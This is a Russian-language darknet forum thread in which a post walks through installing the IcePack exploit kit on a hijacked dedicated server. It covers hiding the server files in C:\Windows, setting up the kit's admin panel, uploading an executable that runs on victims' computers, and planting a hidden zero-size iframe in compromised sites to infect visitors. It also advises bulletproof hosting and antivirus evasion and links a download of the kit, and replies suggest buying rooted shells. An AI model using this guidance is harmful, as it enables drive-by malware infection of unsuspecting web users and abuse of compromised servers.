Перейти к публикации
  • Гавань Пиратов!

    Добро пожаловать в DarkNet! Вы на теневом ресурсе - Гавань Пиратов!

    Чтобы стать участником форума вы должны "Зарегистрироваться", после этого вы сможете писать пользователям в Личные сообщения.

    Для новичков введена "предмодерация" перед публикацией "Тем" и "Cообщений" в темах. Подробнее

    А также, если вы впервые находитесь в DarkNet, вам полезно изучить "Сленг" и "Вопросы и ответы" Подробнее

Akwa

Установка IcePacK на Дедике

Рекомендованные сообщения

Я долго думал , писать эту статью или нет , и вот всё таки решил написать лёгкую статейку по этой теме. Для начала скажу что опытные связководы эксплойтов ничего нового из этой статьи для себя не почерпнут , а новичками или просто людям которым это интересно думаю можно почитать

Что такое ICEPACK можно прочитать здесь .

Ну пожалуй начнём , и так допустим вы имеете дедик и желательно заброшенный , так же дедик должен иметь белый ip адрес , узнать это просто , заходим в Пуск=Выполнить-cmd.exe , далее в смd пишем:

ipconfig/all

вывод команды ipconfig должен быть таким :

C:\>ipconfig/allНастройка протокола IP для Windows Имя компьютера . . . . . . . . . : microsof-e82618 Основной DNS-суффикс . . . . . . : Тип узла. . . . . . . . . . . . . : неизвестный IP-маршрутизация включена . . . . : нет WINS-прокси включен . . . . . . . : нетПодключение по локальной сети - Ethernet адаптер: DNS-суффикс этого подключения . . : Описание . . . . . . . . . . . . : Realtek RTL8169/8110 Family GigabitEthernet NIC Физический адрес. . . . . . . . . : 00-16-17-D6-79-50 Dhcp включен. . . . . . . . . . . : да Автонастройка включена . . . . . : да IP-адрес . . . . . . . . . . . . : 61.201.88.188 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 61.201.18.1 DHCP-сервер . . . . . . . . . . . : 152.16.18.1 DNS-серверы . . . . . . . . . . . : 61.201.18.1 Аренда получена . . . . . . . . . : 29 марта 2009 г. 0:57:33 Аренда истекает . . . . . . . . . : 29 марта 2009 г. 12:57:33C:\>

ip адрес закрашен и изменён , но думаю суть ясна.

097aa640adf1.png

Теперь нам будут нужны Apache+PHP+Mysql , для этого можно выбрать к примеру Vertrigo , он легок , просто в использовании и имеет всё что нам будет нужно для работы ,

[/color][/size]
[size=3][color=white]Компоненты:[/color][/size]
[size=3][color=white]Apache 2.0.63[/color][/size]
[size=3][color=white]PHP 5.2.6[/color][/size]
[size=3][color=white]MySQL 5.0.51b[/color][/size]
[size=3][color=white]SQLite 3.5.9[/color][/size]
[size=3][color=white]Smarty 2.6.19[/color][/size]
[size=3][color=white]PhpMyAdmin 2.11.7[/color][/size]
[size=3][color=white]ZendOptimizer 3.3.3[/color][/size]
[size=3][color=white]SQLiteManager 1.2.0

и всё в одном флаконе, скачаем его от сюда.

Так же хочу отметить что Vertrigo очень просто в установке , устанавливается он двумя кликами .

После того как мы скачали и установили Vertrigo .. хочу заметить , что папку для установки лучше выбрать в директории C:\Windows ... чем не заметней ,тем лучше.

После того как мы всё это проделали , ищем в интернете IcePack Platinum Edition 2007 by IDT Group я специально не размещаю ссылку на него здесь так как IcePack является вредоносным ПО , распаковываем скаченный архив и копируем содержимое папки icepack в C:\Windows\VertrigoServ\www

Далее нам нужно создать базу данных для нашего айспака , для этого в браузере прописываем ip нашего дедики , например:

http://xx.xxx.xxx.xx/phpmyadmin

появится окно авторизации , по дефолту логин root пароль vertrigo , зайдя в PhpMyadmin создаём новую базу , назовём её ice.

так , база создана , идём в директорию с icepack в папку www и правим файл config.php со следующим содержанием

PHP код:

 [/color][/size]
[size=3][color=white]<?php [/color][/size][/left]

[size=3][color=white] [/color][/size]

[size=3][color=white]$config [/color][/size][size=3][color=white][/color][/size]

[left][size=3][color=white]= array ( [/color][/size]
[left][size=3][color=white]'main_url' => "localhost"[/color][/size][/left]


[size=3][color=white], [/color][/size]

[left][size=3][color=white]'admin_name' => "root"[/color][/size][/left]


[size=3][color=white], [/color][/size]

[left][size=3][color=white]'admin_pass' => "vertrigo"[/color][/size][/left]


[size=3][color=white], [/color][/size]

[left][size=3][color=white]); [/color][/size][/left]

[size=3][color=white] [/color][/size]

[left][size=3][color=white]?>[/color][/size][/left]


[size=3][color=white]

так же правим файл db.php

PHP код:

 [/color][/size]
[left][size=3][color=white]<?php [/color][/size]
[size=3][color=white]define ("DBHOST", "localhost"[/color][/size][/left]


[size=3][color=white]); [/color][/size]

[left][size=3][color=white]define ("DBNAME", "ice"[/color][/size][/left]


[size=3][color=white]); [/color][/size]

[left][size=3][color=white]define ("DBUSER", "root"[/color][/size][/left]


[size=3][color=white]); [/color][/size]

[left][size=3][color=white]define ("DBPASS", "vertrigo"[/color][/size][/left]


[size=3][color=white]); [/color][/size]

[left][size=3][color=white]?>[/color][/size][/left]


[size=3][color=white]

 

Кстати советую сменить дефолтный пароль vertrigo на свой !

Теперь всё готово и приступаем к установки IcePack , в браузере пишем

http://xx.xxx.xxx.xx/install.php установка проста до безобразия

всё готово , заходим в админку IcePack

94b6db58c2f4t.jpg

всё готово , заходим в админку IcePack

368d6132e6det.jpg

Ну здесь всё тоже очень просто вкладка Main показывает общую конфигурацию.

5f4540a5f7cdt.jpg

Statistics показывает Refferals=рефералы , Observers=анализаторы , Loadings=какие браузеры были пробиты , The countries=страны , Operational systems= какие были OS

Work with FTP = позволяет работать с ftp аккаунтами , там тоже всё очень просто описывать не вижу смысла .

Самая интересная вкладка Tools , The Traffic=позволяет выбирать страны для блокировки трафика , через Adjustments выбираем файл который будет загружаться и запускаться на компьютере жертвы.

Как видите ничего сверхъестественного в настройке IcePack нет, в URL Script [] : прописываем ваш адрес http://xx.xxx.xx.xxx/ , в Name of the user [] : имя юзера админки , в The password of the user : пароль от админки , и File for loading [] : тут через обзор загружаем нужный нам файл и нажимаем Keep (cм скрин выше)

Ну и самое пожалуй основное это Code iFrame для чего он нужен я объясню в кратции , допустим вы получили доступ к какому либо ресурсу (сайт , форум и тд ) и имеет права для редактирования файла index , в индекс вставляется , iFrame код , незаметно для пользователя идёт перенаправление на наш заражённый адрес (URL) , в следствии чего на компьютер жервы загружается и запускается наш ехе файл.

Iframe код выглядет так :

<iframe src="заражённый url/index.php" width="0" height="0"></iframe>

От себя хочу сказать следующие , обычно такой софт как IcePack размещают на абузоустойчевых серверах и сам IcePack или другая связка эксплойтов не должна палиться антивирусами .

На этом думаю следует закончить , если у кого есть какие либо дополнения , милости прошу , а я наверное начинаю писать статью, как можно защититься этот такого вида угроз !

Данная статья написана с целью ознакомления и следует помнить что данные действия попадают под статьи УК.

© stopxakep

 

Несколько версии айпака: hXXp://www.sendspace.com/file/gt14rd

pass: csu

вместо Vertigo лучше использовать xampp portable - hXXp://portableapps.com/apps/development/xampp

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

разве он актуальный еще? его вроде 5 лет назад с пинчем распространять предлогали

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
разве он актуальный еще? его вроде 5 лет назад с пинчем распространять предлогали

 

ICEPACK не актуален, а вот настройка на дедике веб сервера весьма.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Не вижу смысла делать это всё на дедике. Может лучше купить шелл за 10-15 долларов (Рутованный). Настроить под себя и домен будет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×